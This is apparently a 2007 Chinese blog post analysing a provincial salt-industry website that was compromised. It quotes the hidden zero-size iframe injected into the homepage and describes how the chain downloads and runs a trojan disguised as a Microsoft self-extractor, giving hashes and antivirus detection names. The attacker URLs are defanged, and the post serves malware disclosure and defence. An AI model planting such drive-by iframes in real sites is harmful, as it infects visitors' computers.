某省盐业网被植入传播Trojan.DL.Win32.Agent.zrc的代码
2007-10-29 12:37
417 查看
某省盐业网被植入传播Trojan.DL.Win32.Agent.zrc的代码
endurer 原创
2007-10-29 第1版
该网站首页的首部和尾部被加入代码:
/---
<iframe src=hxxp://h*ot**peak.host**.2*w**cn.com/wm/index.htm width=0 height=0></iframe>
---/
hxxp://h*ot**peak.host**.2*w**cn.com/wm/index.htm 的检查cookies变量HeiYeNo2,若不存在则创建,并输出代码:
/---
<iframe width=0 height=0 src=tcsafe.htm></iframe>
<iframe src=hxxp://h*ot**peak.host**.2*w**cn.com/wm/tcsafe.htm width=0 height=0></iframe>
---/
tcsafe.htm 下载 xxz.exe,保存为 tcsafe.com 并运行。
文件说明符 : d:/test/xxz.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
说明 : Win32 Cabinet Self-Extractor
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 6.00.2900.2180
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : Wextract
源文件名 : WEXTRACT.EXE
创建时间 : 2007-10-26 12:17:32
修改时间 : 2007-10-26 12:17:36
访问时间 : 2007-10-26 12:22:53
大小 : 386560 字节 377.512 KB
MD5 : 452ec2b7ec2f9823a37874e90c55319d
SHA1: 87ABA7445FED3CD5CE2A4DF7CC705902A50B3A8A
CRC32: 07ca93ce
瑞星报为:Trojan.DL.Win32.Agent.zrc>>aspr.ske.2.x.new>>3.exe>>pe_patch(14)>>pe_patch(14)
Hello.
Trojan-Dropper.Win32.Agent.ceb
New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.
-----------------
Regards, Yury Nesmachny
Virus Analyst, Kaspersky Lab.
endurer 原创
2007-10-29 第1版
该网站首页的首部和尾部被加入代码:
/---
<iframe src=hxxp://h*ot**peak.host**.2*w**cn.com/wm/index.htm width=0 height=0></iframe>
---/
hxxp://h*ot**peak.host**.2*w**cn.com/wm/index.htm 的检查cookies变量HeiYeNo2,若不存在则创建,并输出代码:
/---
<iframe width=0 height=0 src=tcsafe.htm></iframe>
<iframe src=hxxp://h*ot**peak.host**.2*w**cn.com/wm/tcsafe.htm width=0 height=0></iframe>
---/
tcsafe.htm 下载 xxz.exe,保存为 tcsafe.com 并运行。
文件说明符 : d:/test/xxz.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
说明 : Win32 Cabinet Self-Extractor
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 6.00.2900.2180
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : Wextract
源文件名 : WEXTRACT.EXE
创建时间 : 2007-10-26 12:17:32
修改时间 : 2007-10-26 12:17:36
访问时间 : 2007-10-26 12:22:53
大小 : 386560 字节 377.512 KB
MD5 : 452ec2b7ec2f9823a37874e90c55319d
SHA1: 87ABA7445FED3CD5CE2A4DF7CC705902A50B3A8A
CRC32: 07ca93ce
瑞星报为:Trojan.DL.Win32.Agent.zrc>>aspr.ske.2.x.new>>3.exe>>pe_patch(14)>>pe_patch(14)
主 题: | RE: xxz.exe [KLAB-3175811] | |
发件人: | "" <newvirus@kaspersky.com> | 发送时间:2007-10-26 13:31:08 |
Trojan-Dropper.Win32.Agent.ceb
New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.
-----------------
Regards, Yury Nesmachny
Virus Analyst, Kaspersky Lab.
相关文章推荐
- 某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
- 某易论坛被植入利用ANI漏洞传播 Backdoor.Win32.Agent.ahj 的代码
- 某市国税信息检索系统被植入传播Worm.Win32.Delf.bs的代码
- 某论坛新游试玩区被植入利用ANI漏洞传播 Trojan.Mnless.kip 的代码
- 某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
- 某网络硬盘网站被植入传播Trojan.DL.Inject.xz等的代码
- 某市职业经理人高级研修学院网站被植入传播Backdoor.Gpigeon.GEN的代码
- CNN卷积神经网络--反向传播(4,代码理解)
- Android中的代码植入
- 【一周时讯技评】安卓平台挖矿蠕虫ADB.Miner勃然而兴,中韩两国成为重灾区|Apple应用下载网站被发现传播挖矿代码
- 开源程序Piwik被植入恶意代码
- EPO+插缝植入用户自定义代码的一种方法
- 某留学网站被植入利用 PPStream 堆栈漏洞的代码
- apk 植入代码
- Python神经网络代码实现流程(三):反向传播与梯度下降
- 【权威发布】360天眼实验室:Xshell被植入后门代码事件分析报告(完整版)
- ARP病毒自动加入传播Trojan.PSW.Win32.OnlineGames的代码
- Satori危机加剧 黑客已将代码公开传播
- 某市河西区教育信息网被加入传播Worm.Win32.Viking.jr等的代码
- 质量糟糕的代码会在项目中像病毒一样传播,尽量在源头控制好代码质量、强调范例的重要性